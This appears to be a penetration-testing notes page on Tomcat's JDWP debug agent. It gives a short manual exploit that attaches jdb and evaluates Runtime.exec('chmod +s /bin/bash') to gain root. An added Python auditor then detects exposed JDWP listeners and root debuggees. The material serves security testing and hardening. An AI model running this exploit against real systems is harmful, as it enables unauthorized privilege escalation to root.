Java Debug Wire Protocol (JDWP)
Startup
JDWP is enabled through the Tomcat startup parameters. Example:
/usr/bin/java -Djava.util.logging.config.file=/opt/apache-tomcat-9.0.27/conf/logging.properties [...redacted...]
-agentlib:jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n [...redacted...]
Attacks
- Privesc RCE if Tomcat is running as root: the attack obtains java.lang.Runtime.getRuntime() and uses it to invoke exec(), passing a String object.
Manual Exploitation of RCE
jdb -attach 127.0.0.1:8000
> stop in javax.servlet.GenericServlet.init()
> Set deferred breakpoint javax.servlet.GenericServlet.init()
main[1] eval new java.lang.Runtime().exec("chmod +s /bin/bash")
Tips
- If the exploit is not working, ensure that Tomcat is hitting a breakpoint, for example by restarting Tomcat.
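
To find JVMs started with the debug agent shown under Startup, the following added example (not part of the original page) parses Java command lines for the JDWP option, classifies the listener's bind address, and flags the root condition named under Attacks. The function names, finding labels and sample command lines are constructed for illustration.

```python
import re

# Matches the modern -agentlib:jdwp= form and the legacy -Xrunjdwp: form.
JDWP_OPT = re.compile(r"(?:-agentlib:jdwp=|-Xrunjdwp:)(\S+)")
LOOPBACK = {"localhost", "127.0.0.1", "::1", "[::1]"}

def parse_jdwp(cmdline):
    """Return the JDWP agent sub-options as a dict, or None if absent."""
    m = JDWP_OPT.search(cmdline)
    if not m:
        return None
    return dict(kv.split("=", 1) for kv in m.group(1).split(",") if "=" in kv)

def audit(user, cmdline):
    """Return a list of findings for one (user, command line) pair."""
    opts = parse_jdwp(cmdline)
    if opts is None:
        return []
    findings = ["jdwp-enabled"]
    if opts.get("server") == "y":
        # rpartition keeps IPv6 hosts intact; a bare port yields host == "".
        host, _, _port = opts.get("address", "").rpartition(":")
        if host == "":
            # JDK 9+ binds a bare port to localhost; JDK 8 and older bind all interfaces.
            findings.append("listener-bind-depends-on-jdk-version")
        elif host in LOOPBACK:
            # Loopback only, but still reachable by any local user.
            findings.append("listener-loopback-only")
        else:
            findings.append("listener-network-exposed")
    if user == "root":
        findings.append("debuggee-runs-as-root")
    return findings

# Constructed sample data: (user, command line) pairs, e.g. as read from `ps -eo user,args`.
SAMPLES = [
    ("root", "/usr/bin/java -agentlib:jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n org.apache.catalina.startup.Bootstrap start"),
    ("tomcat", "/usr/bin/java -Xdebug -Xrunjdwp:transport=dt_socket,address=*:5005,server=y,suspend=n app.jar"),
    ("tomcat", "/usr/bin/java -agentlib:jdwp=transport=dt_socket,address=8000,server=y,suspend=n app.jar"),
    ("tomcat", "/usr/bin/java -Xmx512m org.apache.catalina.startup.Bootstrap start"),
]

if __name__ == "__main__":
    for user, cmd in SAMPLES:
        print(user, audit(user, cmd) or "no JDWP agent")
```

Any "jdwp-enabled" finding on a production host is worth removing from the startup parameters; the loopback case only narrows exposure to local users.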